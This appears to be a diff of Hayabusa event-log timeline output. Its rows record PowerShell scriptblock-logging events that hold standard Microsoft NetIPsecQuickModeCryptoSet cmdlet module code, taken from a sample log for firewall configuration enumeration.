($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder =",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.020 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"$__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecQuickModeCryptoSet' function Set-NetIPsecQuickModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('PfsGroup')] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup')) { [object]$__cmdletization_value = ${PerfectForwardSecrecyGroup} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecQuickModeCryptoSet' function Remove-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microso",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.020 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecQuickModeCryptoSet' function Rename-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', 